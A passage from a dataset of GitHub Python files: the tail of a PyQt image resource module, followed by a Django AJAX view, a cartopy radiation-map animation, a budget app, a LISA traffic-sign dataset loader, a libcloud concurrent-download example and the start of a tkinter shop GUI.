9b\\x69\\\n\\xdb\\x48\\xcd\\x5c\\xad\\xc4\\x6c\\x8d\\x47\\x63\\x1a\\xa7\\x22\\xdd\\x3a\\xb1\\\n\\x31\\x26\\x83\\x9d\\x0d\\x83\\x62\\x6e\\x3d\\x44\\x77\\x8a\\x42\\x5f\\x82\\xdb\\\n\\xc5\\x92\\x0c\\xa4\\xcf\\xca\\xd9\\x4b\\x4e\\xf1\\x2d\\x83\\x65\\x74\\x55\\xee\\\n\\x20\\xd2\\x29\\x1a\\x94\\x88\\xa9\\xc7\\x24\\x26\\xcb\\xb2\\xc8\\x69\\x2b\\x71\\\n\\xd5\\x37\\x75\\x20\\x2b\\x2e\\x96\\xb8\\x07\\x40\\x7c\\xc0\\x0a\\xd4\\xc2\\xda\\\n\\x60\\xcd\\x49\\xa1\\xa4\\x21\\x49\\xcb\\x72\\xdd\\xf5\\x4f\\x5e\\x77\\xe7\\xce\\\n\\x06\\x64\\x92\\xf6\\xa5\\x4d\\x34\\x93\\x01\\x09\\x51\\x48\\x40\\xca\\x5c\\x17\\\n\\x49\\x26\\xc6\\xfd\\x20\\x43\\x37\\xe4\\x98\\x6e\\x5d\\xe5\\x05\\x38\\x73\\x1b\\\n\\x94\\x8b\\xf4\\x00\\xd8\\x5a\\x28\\x4a\\x6b\\x9e\\x1c\\x08\\xb9\\x24\\xda\\xf7\\\n\\x3c\\xe3\\x43\\x9d\\x30\\x9b\\x7c\\xc7\\x59\\xb3\\x8a\\x55\\x81\\xc8\\x40\\x02\\\n\\x29\\x08\\x51\\x2c\\x09\\x4a\\x0f\\x2d\\x4f\\xce\\x18\\x90\\x8b\\x01\\xc9\\x23\\\n\\xf0\\xc4\\x8e\\x6a\\x58\\x8b\\xba\\x56\\xa7\\x09\\x51\\x42\\x2c\\x2f\\xac\\x6a\\\n\\xdc\\x2c\\x62\\x7e\\x0e\\x2d\\x64\\xb1\\x95\\x5c\\xd3\\xe9\\xbe\\x86\\x34\\x61\\\n\\x2f\\x2d\\x3e\\xec\\x9c\\xba\\x58\\x5e\\x2c\\xcd\\x30\\xb1\\x96\\x85\\x9c\\xa9\\\n\\xe5\\xca\\xf1\\x66\\x6a\\x88\\x65\\x32\\xe2\\x9c\\x56\\x55\\x1b\\xda\\x35\\x43\\\n\\x07\\xb5\\x1b\\x88\\xc8\\x0e\\x2b\\x36\\x5b\\xf4\\xbc\\x59\\x8d\\x28\\x09\\x98\\\n\\x50\\x1a\\x0e\\xf0\\xd1\\xca\\x0a\\xc4\\x2e\\x13\\x2f\\x27\\x92\\xbf\\x58\\xd6\\\n\\xa5\\x32\\x58\\x6d\\x51\\x67\\x27\\x32\\xaa\\x9f\\x50\\x71\\x94\\xbc\\xb6\\x5c\\\n\\x4b\\x65\\x2b\\x26\\xce\\x27\\x52\\x01\\xb6\\xba\\x5a\\xc2\\xc7\\xfa\\x40\\xe5\\\n\\xa6\\x97\\x26\\x33\\xaa\\x03\\x6a\\x47\\xb1\\x71\\x1d\\x95\\x16\\x79\\x75\\x19\\\n\\x46\\xdd\\x75\\x36\\x59\\x49\\x24\\xdf\\xb4\\x74\\x4e\\x67\\x98\\xe6\\xd3\\x16\\\n\\x8c\\xc6\\xe7\\x76\\x05\\xc0\\x26\\xd0\\x86\\x5a\\x86\\xd2\\x50\\x41\\xd4\\x1d\\\n\\x08\\x3d\\x62\\x14\\x68\\x6b\\xe7\\x30\\xcd\\x26\\x79\\x05\\xc0\\xd2\\xa5\\x5c\\\n\\x17\\xe2\\x97\\x39\\x2f\\xdf\\x4e\\x51\\xcb\\x12\\x0b\\x2a\\xc4\\x75\\xc3\\x8c\\\n\\xfc\\x99\\xde\\x38\\x9a\\xe4\\xba\\xa8\\xee\\x7b\\x03\\x6e\\x6f\\x12\\x81\\x70\\\n\\x42\\x72\\xff\\x00\\x8f\\x61\\x1e\\x5a\\x9e\\xaa\\x18\\x93\\x0b\\x32\\x6d\\x8b\\\n\\x59\\x44\\xa3\\x9d\\xad\\xd0\\x6b\\xfc\\x4c\\x05\\x1a\\xe7\\x26\\x5c\\x71\\xf0\\\n\\xa7\\x42\\x14\\x4a\\x07\\xa6\\xc0\\x0f\\x11\\x48\\x62\\xaa\\xb2\\x31\\x8b\\x85\\\n\\x05\\x20\\x25\\x26\\xe3\\xa8\\x8b\\x1a\\x24\\xc9\\x52\\x94\\xa4\\x95\\x12\\x6e\\\n\\x05\\x86\\xbd\\x2d\\xca\\x1a\\x81\\x5a\\x74\\x00\\x8e\\x66\\x02\\x94\\x62\\x46\\\n\\x73\\x64\\x84\\x81\\xda\\x11\\x23\\x0b\\x87\\x43\\x89\\x51\\x4a\\xbb\\x8f\\x94\\\n\\x56\\x90\\x76\\x73\\x18\\x8b\\xd5\\x44\\x9e\\x64\\xc6\\x6a\\x6e\\x99\\x20\\x92\\\n\\x5b\\x58\\x52\\x7f\\x8c\\x0d\\x72\\xb5\\xd7\\x81\\x70\\x92\\x4a\\x6f\\x66\\xeb\\\n\\x73\\xb3\\x34\\x16\\xa4\\x5f\\x56\\x66\\x1b\\xe2\\x48\\xea\\x23\\x57\\x2e\\x96\\\n\\x73\\x95\\x8d\\x93\\xa9\\xcc\\x73\\xa6\\xfd\\xe3\\x23\\xb5\\x0a\\xc1\\x27\\x9c\\\n\\x05\\x0a\\x
\\x80\\x0f\\xff\\xd9\\\n\"\n\nqt_resource_name = b\"\\\n\\x00\\x06\\\n\\x06\\xe9\\xc7\\x63\\\n\\x00\\x67\\\n\\x00\\x72\\x00\\x75\\x00\\x70\\x00\\x6f\\x00\\x73\\\n\\x00\\x0a\\\n\\x07\\x6b\\x82\\xe7\\\n\\x00\\x67\\\n\\x00\\x72\\x00\\x75\\x00\\x70\\x00\\x6f\\x00\\x73\\x00\\x2e\\x00\\x6a\\x00\\x70\\x00\\x67\\\n\"\n\nqt_resource_struct_v1 = b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\\n\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\"\n\nqt_resource_struct_v2 = b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x01\\x71\\x1a\\x32\\x67\\x63\\\n\"\n\n# compare version components as integers so that e.g. Qt 5.10 does not sort before Qt 5.8\nqt_version = [int(v) for v in QtCore.qVersion().split('.')]\nif qt_version < [5, 8, 0]:\n    rcc_version = 1\n    qt_resource_struct = qt_resource_struct_v1\nelse:\n    rcc_version = 2\n    qt_resource_struct = qt_resource_struct_v2\n\ndef qInitResources():\n    QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\ndef qCleanupResources():\n    QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\nqInitResources()\n","repo_name":"migherize/Champions","sub_path":"grupos_rc.py","file_name":"grupos_rc.py","file_ext":"py","file_size_in_byte":607754,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"15954856189","text":"from django.core.paginator import Paginator\nfrom django.http import JsonResponse\nfrom django.template.loader import render_to_string\nfrom .models import School, Zone, Student\n\n\ndef get_school_by_zone(request):\n    selected_zone_id = request.GET.get('selected_zone_id', None)\n    selected_zone = Zone.objects.get(id=selected_zone_id)\n    schools = School.objects.filter(zone=selected_zone)\n    t = render_to_string('auths/school_by_zone.html', {'data': schools})\n    return JsonResponse({'data': t})\n\n\ndef get_student_by_school(request):\n    selected_school_id = request.GET.get('selected_school_id', None)\n    selected_school = School.objects.get(id=selected_school_id)\n    all_students = Student.objects.filter(current_school=selected_school)\n    paginator = Paginator(all_students, 4)\n    page = request.GET.get('page')\n    students = paginator.get_page(page)\n    t = render_to_string('auths/students_by_school.html', {'data': students})\n    return JsonResponse({'data': t})","repo_name":"MayowaFunmi/school-management-system-v2","sub_path":"auths/ajax_view.py","file_name":"ajax_view.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"70446881389","text":"import cartopy.crs as ccrs\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as ani\nimport glob\nimport xarray as xr\nimport sys,os,subprocess\nimport numpy as np\nfrom cartopy import config\nfrom matplotlib import cm\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\n\n
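# Descriptive note: this script animates top-of-atmosphere outgoing longwave radiation\n# (the absolute value of the lwflxall variable) on a map and saves the frames as an MP4\n# via ananas.save('olr_full.mp4') below.\n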
basedir = '/work/bb1018/b380873/tropic_run2_output/'\nolr_file = basedir + 'OLR_TOA_all.nc'\nolr_data = xr.open_dataset(olr_file)\nolr_vals = np.abs(olr_data.lwflxall.values)\nlons = olr_data.lon\nlats = olr_data.lat\nzeit = olr_data.time\nprint(zeit[0])\nprint(zeit[-1])\n# sys.exit()  # leftover debugging exit; with it in place the animation below would never run\n# pulling this from the following stackoverflow\n# https://stackoverflow.com/questions/30030328/correct-placement-of-colorbar-relative-to-geo-axes-cartopy\ndef resize_colorbar(event):\n    plt.draw()\n\n    posn = ax.get_position()\n    cbar_ax.set_position([posn.x0 + posn.width + 0.01, posn.y0,\n                          0.04, posn.height])\n\n\nfig, ax = plt.subplots(1,1,figsize=(11,3.7),\n          subplot_kw={'projection': ccrs.PlateCarree()})\ncbar_ax = fig.add_axes([0, 0, 0.1, 0.1])\nfig.subplots_adjust(hspace=0, wspace=0, top=0.925, left=0.1)\n\n#levs = np.logspace(-1,2.5,15)\n#levs = np.linspace(0,800,15)\nlevs = np.linspace(100,390,15)\ndef animate(i):\n    print(i)\n    ax.clear()\n    print(olr_vals[i,0].shape)\n    print(np.nanmin(olr_vals[i,0]),np.nanmean(olr_vals[i,0]),np.nanmax(olr_vals[i,0]))\n    im = ax.contourf(lons,lats,olr_vals[i,0],levels=levs,cmap=cm.viridis,\\\n         transform=ccrs.PlateCarree()) \n\n    fig.canvas.mpl_connect('resize_event', resize_colorbar)\n    plt.colorbar(im,label=r'W m$^{-2}$',cax=cbar_ax)\n\n    ax.set_title('TOA OLR: '+ str(zeit[i].values))\n    gl = ax.gridlines(crs=ccrs.PlateCarree(),draw_labels=True,\n          linewidth=1,color='gray',alpha=0.5,linestyle='--')\n    gl.xlabels_top = False\n    gl.ylabels_right = False\n    gl.xformatter = LONGITUDE_FORMATTER\n    gl.yformatter = LATITUDE_FORMATTER\n\n    ax.set_extent([55,170,-5,38],crs=ccrs.PlateCarree())\n    im.set_clim([100,400])\n    ax.coastlines()\n    resize_colorbar(None)\n\n\nananas = ani.FuncAnimation(fig,animate,35,interval=700,blit=False)\nananas.save('olr_full.mp4')\nplt.show()\n","repo_name":"sylviasullivan/ice-microp-rad","sub_path":"rad/olr_video3.py","file_name":"olr_video3.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"73042221227","text":"class Category:\n    #I hate problems like these\n    def __init__(self, category):\n        self.dep_amount = 0.0\n        self.wit_amount = 0.0\n        self.name = category\n        self.ledger = []\n    \n    def __str__(self):\n        s = f\"{self.name:*^30}\\n\"\n\n        for item in self.ledger:\n            s_desc = item['description']\n            s += f\"{s_desc[:23]:<23}\"+f\"{item['amount']:>7.2f}\\n\"\n        s += \"Total: \"+str(self.get_balance())\n\n        return s\n\n    def deposit(self, amount, desc=''):\n        dep = dict()\n        dep['amount'] = amount\n        dep['description'] = desc\n\n        self.ledger.append(dep)\n\n        self.dep_amount = self.dep_amount + amount\n\n    def get_balance(self):\n        return (self.dep_amount-self.wit_amount)\n\n    def check_funds(self, amount):\n        return(self.get_balance()>=amount)\n\n    def withdraw(self, amount, desc=''):\n        if self.check_funds(amount) == False:\n            return False\n\n        wit = dict()\n        wit['amount'] = (amount*(-1))\n        wit['description'] = desc\n\n        self.ledger.append(wit)\n\n        self.wit_amount = self.wit_amount + amount\n\n        return True\n\n    def transfer(self,amount, account):\n        if self.check_funds(amount) is False:\n            return False\n        else:\n            self.withdraw(amount, f\"Transfer to {account.name}\")\n            account.deposit(amount, f\"Transfer from {self.name}\")\n            return True\n\ndef rounded(num):\n    #floor a fraction down to the nearest tenth (e.g. 0.47 -> 0.4); the old (num*rounder)/rounder was a no-op\n    rounder = 10\n    return int(num * rounder) / rounder\n\n
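# each category's share of total withdrawals, floored down to the nearest 10%\n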
def percentages(l_categories):\n    total = 0\n    cat_withdrew = []\n    cat_wit_percent = []\n\n    for category in l_categories:\n        total += category.wit_amount\n        cat_withdrew.append(category.wit_amount)\n\n    for i in range(len(cat_withdrew)):\n        num = rounded(cat_withdrew[i]/total)\n        cat_wit_percent.append(num)\n    return cat_wit_percent\n\ndef create_spend_chart(categories):\n    #head of visual\n    header = \"Percentage spent by category\\n\"\n    \n    #graph portion\n    graph_str = ''\n    index = 100\n    percents = percentages(categories)\n    \n    while index >= 0:\n        #initial spaces in graph from side index percentages\n        graph = \" \"\n        for percent in percents:\n            if percent * 100 >= index:\n                graph += \"o  \"\n            else:\n                graph += \"   \"\n        index_str = str(index)\n        graph_str += f\"{index_str:>3}|\"+graph+\"\\n\"\n        #intervals of 10 for percent index\n        index-=10\n    \n    #3 --- for each category name + '-' for the ending....don't forget initial spacing\n    underline = \" -\" + \"---\"*len(categories)+\"\\n\"\n    \n    #last portion of string \n    names = []\n\n    for category in categories:\n        names.append(category.name)\n    #max with key arg key=len retrieves largest item from a list\n    max_str = len(max(names, key=len))\n    #create vertical lines length of longest...5 spaces to start\n    vert_names = ' '\n    \n    for i in range(max_str):\n        for name in names:\n            if i >= len(name):\n                #blank space for when no letter\n                vert_names += \"   \"\n            else:\n                #add letter when index is within name length\n                vert_names += name[i] + \"  \"\n        #newline for every iteration of loop till end\n        if(i != max_str -1 ):\n            #add 5 spaces after \\n for initial line spacing\n            vert_names += '\\n    '\n\n\n    #string construction of parts\n    return header+graph_str+underline+vert_names","repo_name":"FuzzyWombatt/FCC-python-scientific-computing","sub_path":"budget-app/budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"21027927259","text":"'''This program will count each character's appearance in the file passed'''\ndef char_count(file):\n    dictionary={}\n    with open(file,'r') as f:\n        data=f.read()\n        char_tuple=tuple(data)\n        for entry in char_tuple:\n            if entry not in dictionary.keys():\n                dictionary[entry]=1\n            else:\n                dictionary[entry]+=1\n    for k,v in dictionary.items():\n        print(\"character {} is : {} times\".format(k,v))\n    \nchar_count('readme.txt')\n","repo_name":"dheepan2/python_projects","sub_path":"character_count.py","file_name":"character_count.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"34245753351","text":"import fnmatch\nimport os\n\nimport numpy as np\n\nfrom PIL import Image, ImageDraw\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, SubsetRandomSampler, DataLoader\n\nfrom torchvision import transforms\nimport matplotlib.pyplot as plt\nimport random\n\n\nclass LisaDataset(Dataset):\n    def __init__(self, img_dir, lab_dir, max_lab, img_size, shuffle=True, transform=None):\n        self.img_dir = img_dir\n        self.lab_dir = lab_dir\n        self.img_size = img_size\n        self.shuffle = shuffle\n        self.img_names = self.get_image_names()\n        self.img_paths = self.get_image_paths()\n        self.lab_paths = self.get_lab_paths()\n        self.max_n_labels = max_lab\n        self.transform = transform\n\n    def __len__(self):\n        return len(self.img_names)\n\n    def __getitem__(self, idx):\n        assert idx < len(self), 'index range error'  # valid indices run from 0 to len-1\n        img_path = os.path.join(self.img_dir, self.img_names[idx])\n        lab_path = os.path.join(self.lab_dir, self.img_names[idx]).replace('.jpg', '.txt').replace('.png', 
'.txt')\n image = Image.open(img_path).convert('RGB')\n if os.path.getsize(lab_path): # check to see if label file contains data.\n label = np.loadtxt(lab_path)\n else:\n label = np.ones([5])\n\n label = torch.from_numpy(label).float()\n if label.dim() == 1:\n label = label.unsqueeze(0)\n\n # image, label = self.pad_and_scale(image, label)\n if self.transform:\n image = self.transform(image)\n\n label = self.pad_lab(label)\n return image, label, self.img_names[idx]\n\n def get_image_names(self):\n png_images = fnmatch.filter(os.listdir(self.img_dir), '*.png')\n jpg_images = fnmatch.filter(os.listdir(self.img_dir), '*.jpg')\n n_png_images = len(png_images)\n n_jpg_images = len(jpg_images)\n n_images = n_png_images + n_jpg_images\n n_labels = len(fnmatch.filter(os.listdir(self.lab_dir), '*.txt'))\n assert n_images == n_labels, \"Number of images and number of labels don't match\"\n return png_images + jpg_images\n\n def get_image_paths(self):\n img_paths = []\n for img_name in self.img_names:\n img_paths.append(os.path.join(self.img_dir, img_name))\n return img_paths\n\n def get_lab_paths(self):\n lab_paths = []\n for img_name in self.img_names:\n lab_path = os.path.join(self.lab_dir, img_name).replace('.jpg', '.txt').replace('.png', '.txt')\n lab_paths.append(lab_path)\n return lab_paths\n\n def pad_and_scale(self, img, lab):\n w, h = img.size\n if w == h:\n padded_img = img\n else:\n dim_to_pad = 1 if w < h else 2\n if dim_to_pad == 1:\n padding = (h - w) / 2\n padded_img = Image.new('RGB', (h, h), color=(255, 255, 255))\n padded_img.paste(img, (int(padding), 0))\n lab[:, [1]] = (lab[:, [1]] * w + padding) / h\n lab[:, [3]] = (lab[:, [3]] * w / h)\n else:\n padding = (w - h) / 2\n padded_img = Image.new('RGB', (w, w), color=(255, 255, 255))\n padded_img.paste(img, (0, int(padding)))\n lab[:, [2]] = (lab[:, [2]] * h + padding) / w\n lab[:, [4]] = (lab[:, [4]] * h / w)\n resize = transforms.Resize((self.img_size, self.img_size))\n padded_img = resize(padded_img) # choose here\n\n return padded_img, lab\n\n def pad_lab(self, lab):\n pad_size = self.max_n_labels - lab.shape[0]\n if pad_size > 0:\n padded_lab = F.pad(lab, [0, 0, 0, pad_size], value=-1)\n else:\n padded_lab = lab\n return padded_lab\n\n\nclass SplitDataset:\n def __init__(self, img_dir, lab_dir, max_lab, img_size, transform=None):\n self.dataset = LisaDataset(img_dir=img_dir,\n lab_dir=lab_dir,\n max_lab=max_lab,\n img_size=img_size,\n transform=transform)\n self.img_dir = img_dir\n\n def __call__(self, val_split, test_split, shuffle_dataset, random_seed, batch_size, ordered, *args, **kwargs):\n if not ordered:\n dataset_size = len(self.dataset)\n indices = list(range(dataset_size))\n val_split = int(np.floor(val_split * dataset_size))\n test_split = int(np.floor(test_split * dataset_size))\n if shuffle_dataset:\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n train_indices = indices[val_split + test_split:]\n val_indices = indices[:val_split]\n test_indices = indices[val_split:val_split + test_split]\n else:\n train_indices = []\n val_indices = []\n test_indices = []\n all_videos = self.get_frames_per_video()\n num_of_videos = len(all_videos)\n for idx, image in enumerate(os.listdir(self.img_dir)):\n video_name = image.split('.avi_')[0]\n if all_videos[video_name] < int((1 - val_split - test_split) * num_of_videos):\n train_indices.append(idx)\n elif all_videos[video_name] < int((1 - val_split) * num_of_videos):\n val_indices.append(idx)\n else:\n test_indices.append(idx)\n np.random.shuffle(train_indices)\n 
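# whole videos were assigned to a split above; these in-place shuffles only randomize frame order within each split\n            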
np.random.shuffle(val_indices)\n            np.random.shuffle(test_indices)\n\n        # Creating PT data samplers and loaders:\n        train_sampler = SubsetRandomSampler(train_indices)\n        valid_sampler = SubsetRandomSampler(val_indices)\n        test_sampler = SubsetRandomSampler(test_indices)\n\n        train_loader = DataLoader(self.dataset, batch_size=batch_size, sampler=train_sampler)\n        validation_loader = DataLoader(self.dataset, batch_size=batch_size, sampler=valid_sampler)\n        test_loader = DataLoader(self.dataset, sampler=test_sampler)\n\n        return train_loader, validation_loader, test_loader\n\n    def get_frames_per_video(self):\n        videos = dict()\n        idx = 1\n        for image in os.listdir(self.img_dir):\n            video_name = image.split('.avi_')[0]\n            if video_name not in videos.keys():\n                videos[video_name] = 1\n                idx += 1\n        indices_list = [i for i in range(idx)]\n        for key, value in videos.items():\n            rand_value = random.choice(indices_list)\n            videos[key] = rand_value\n            indices_list.remove(rand_value)\n        return videos\n\n\nclass SplitDataset1:\n    def __init__(self, img_dir_train_val, lab_dir_train_val, img_dir_test, lab_dir_test, max_lab, img_size, transform=None):\n        self.dataset_train_val = LisaDataset(img_dir=img_dir_train_val,\n                                             lab_dir=lab_dir_train_val,\n                                             max_lab=max_lab,\n                                             img_size=img_size,\n                                             transform=transform)\n        self.dataset_test = LisaDataset(img_dir=img_dir_test,\n                                        lab_dir=lab_dir_test,\n                                        max_lab=max_lab,\n                                        img_size=img_size,\n                                        transform=transform)\n        self.img_dir = img_dir_train_val\n\n    def __call__(self, val_split, test_split, shuffle_dataset, random_seed, batch_size, *args, **kwargs):\n        train_indices = []\n        val_indices = []\n        all_videos = self.get_frames_per_video()\n        num_of_videos = len(all_videos)\n        for idx, image in enumerate(os.listdir(self.img_dir)):\n            video_name = image.split('.avi_')[0]\n            if all_videos[video_name] < int((1 - val_split) * num_of_videos):\n                train_indices.append(idx)\n            else:\n                val_indices.append(idx)\n        np.random.shuffle(train_indices)\n        np.random.shuffle(val_indices)\n\n        # Creating PT data samplers and loaders:\n        train_sampler = SubsetRandomSampler(train_indices)\n        valid_sampler = SubsetRandomSampler(val_indices)\n\n        train_loader = DataLoader(self.dataset_train_val, batch_size=batch_size, sampler=train_sampler)\n        validation_loader = DataLoader(self.dataset_train_val, batch_size=batch_size, sampler=valid_sampler)\n        test_loader = DataLoader(self.dataset_test)\n\n        return train_loader, validation_loader, test_loader\n\n    def get_frames_per_video(self):\n        videos = dict()\n        idx = 1\n        for image in os.listdir(self.img_dir):\n            video_name = image.split('.avi_')[0]\n            if video_name not in videos.keys():\n                videos[video_name] = 1\n                idx += 1\n        indices_list = [i for i in range(idx)]\n        for key, value in videos.items():\n            rand_value = random.choice(indices_list)\n            videos[key] = rand_value\n            indices_list.remove(rand_value)\n        return videos\n\n\ndef main():\n    img_dir = '../datasets/lisa/images'\n    lab_dir = '../datasets/lisa/annotations'\n    test_data_loader = torch.utils.data.DataLoader(LisaDataset(img_dir=img_dir,\n                                                               lab_dir=lab_dir,\n                                                               max_lab=14,\n                                                               img_size=416),\n                                                   batch_size=3,\n                                                   shuffle=True)\n\n    # __getitem__ returns (image, label, image name), so unpack all three values\n    for i_batch, (img_batch, lab_batch, img_names) in enumerate(test_data_loader):\n        for lab in lab_batch:\n            print(lab)\n        plt.imshow(img_batch[0].permute(1, 2, 0))\n        plt.show()\n\n\nif __name__ == '__main__':\n    
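# quick visual smoke test: iterate a few batches and display the first image of each\n    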
main()\n","repo_name":"AlonZolfi/transparent_patch","sub_path":"patch/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":9922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23689259862","text":"import os.path\n\nfrom gevent import monkey # pylint: disable=import-error\nfrom gevent.pool import Pool # pylint: disable=import-error\n\nfrom libcloud.storage.types import Provider\nfrom libcloud.storage.providers import get_driver\n\nmonkey.patch_all()\n\n\nUSERNAME = \"username\"\nAPI_KEY = \"api key\"\n\ncls = get_driver(Provider.CLOUDFILES_US)\ndriver = cls(USERNAME, API_KEY)\n\n\ndef download_obj(container, obj):\n driver = cls(USERNAME, API_KEY)\n obj = driver.get_object(container_name=container.name, object_name=obj.name)\n filename = os.path.basename(obj.name)\n path = os.path.join(os.path.expanduser(\"~/Downloads\"), filename)\n print(\"Downloading: {} to {}\".format(obj.name, path))\n obj.download(destination_path=path)\n\n\ncontainers = driver.list_containers()\n\njobs = []\npool = Pool(20)\n\nfor index, container in enumerate(containers):\n objects = container.list_objects()\n\n for obj in objects:\n pool.spawn(download_obj, container, obj)\n\npool.join()\nprint(\"Done\")\n","repo_name":"apache/libcloud","sub_path":"docs/examples/storage/concurrent_file_download_using_gevent.py","file_name":"concurrent_file_download_using_gevent.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":1969,"dataset":"github-code","pt":"37"} +{"seq_id":"34318028209","text":"from tkinter import * #imports tkinter lib\nimport tkinter.messagebox #imports tkinter messagebox from tkinter lib\n\naddtocart = [] #empty list for total quantity in shopping cart\nquadstellar = [] #empty list for quantity of specified item\nmoonrock = []\nsnowflake = []\nboomer = []\ninterstellar = []\nnasasuper = []\nheatwave = []\nzoomer = []\nquantity = [1] #list used to append 1 item to each respective cart\nprice = [2800, 4000, 1000, 900] #list for prices\n\ndef clearcart(): #function to clear cart after pressing clear cart button on home page (OKASHA)\n quadstellar.clear() #clears each respective list\n moonrock.clear()\n snowflake.clear()\n boomer.clear()\n interstellar.clear()\n nasasuper.clear()\n heatwave.clear()\n zoomer.clear()\n addtocart.set(0) #resets cart to 0 because this is set as an IntVar, so we cannot use clear command\n \ndef menu(): #function for the sidebar menu\n def sidebarhide(): #function to hide the sidebar(HARNOOR)\n sidebarlol = Label(app, width=33, height=41, bg=\"AntiqueWhite3\").place(relx=0.0096, rely=0.40) #label that had a bg of white that covers the sidebar\n sidebar = Button(app, text=\"=\", width=25, height=1, bg=\"#383838\", command=menu, fg=\"white\", font=(\"Calibri\", 13, \"bold\")) #sidebar button which makes the side bar appear and disappear\n sidebar.place(relx=0.01, rely=0.350) #coordinates for sidebar\n product = Label(app, width=500, height=310, bg=\"AntiqueWhite3\").place(relx=0.165, rely=0.335) #label that hides products\n \n def pcs(): #function for PC products(HARNOOR)\n pc = PhotoImage(file = \"pc1.png\", height=300) #imports image for first pc\n w = Label(app, image = pc) #creates a label for the image so we can use it to edit dimensions and properties\n w.place(relx=0.165, rely=0.350) #coords for image\n w.photo = pc \n pc = Label(app, text=\"Quadstellar\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, 
\"bold\")) #adds label of our product name\n pc.place(relx=0.165, rely=0.350) #coords for product name\n pctext = Label(app, text=\"Price: $2800\", width=33, font=(\"Calibri\", 13, \"bold\")) #prices(appearance only)\n pctext.place(relx=0.165, rely=0.650) #coords for prices\n pctext2 = Label(app, text=\"Intel Core i7 8700K\\n RTX 2060 Super\\n DDR4 16GB 3200Mhz\\n 1TB HDD\", width=33, font=(\"Calibri\", 13, \"bold\")) #PC specs\n pctext2.place(relx=0.165, rely=0.690) #pc specs coords\n cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty1, font=(\"Calibri\", 13, \"bold\")) #add to cart button which appends to the main cart, and the secondary product cart which is used for the checkout screen to see how much of what you ordered\n cartbutton.place(relx=0.165, rely=0.790)\n \n pc = PhotoImage(file = \"pc2.png\", height=300)\n w = Label(app, image = pc)\n w.place(relx=0.365, rely=0.350)\n w.photo = pc\n pc = Label(app, text=\"Moonrock\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\"))\n pc.place(relx=0.365, rely=0.350)\n pc.pack\n pctext = Label(app, text=\"Price: $4000\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext.place(relx=0.365, rely=0.650)\n pctext2 = Label(app, text=\"AMD Threadripper 2950X\\n RTX 2080Ti\\n DDR4 64GB 3200Mhz\\n 2TB SSD\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext2.place(relx=0.365, rely=0.690)\n cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty2, font=(\"Calibri\", 13, \"bold\"))\n cartbutton.place(relx=0.365, rely=0.790)\n \n pc = PhotoImage(file = \"pc3.png\", height=300)\n w = Label(app, image = pc)\n w.place(relx=0.565, rely=0.350)\n w.photo = pc\n pc = Label(app, text=\"Snowflake\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\"))\n pc.place(relx=0.565, rely=0.350)\n pc.pack\n pctext = Label(app, text=\"Price: $1000\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext.place(relx=0.565, rely=0.650)\n pctext2 = Label(app, text=\"AMD Ryzen 7 2700x\\n RTX 2060 OC\\n DDR4 16GB 3200Mhz\\n 1TB HDD\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext2.place(relx=0.565, rely=0.690)\n cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty3, font=(\"Calibri\", 13, \"bold\"))\n cartbutton.place(relx=0.565, rely=0.790)\n \n pc = PhotoImage(file = \"pc4.png\", height=300)\n w = Label(app, image = pc)\n w.place(relx=0.765, rely=0.350)\n w.photo = pc\n pc = Label(app, text=\"Boomer\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\"))\n pc.place(relx=0.765, rely=0.350)\n pc.pack\n pctext = Label(app, text=\"Price: $900\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext.place(relx=0.765, 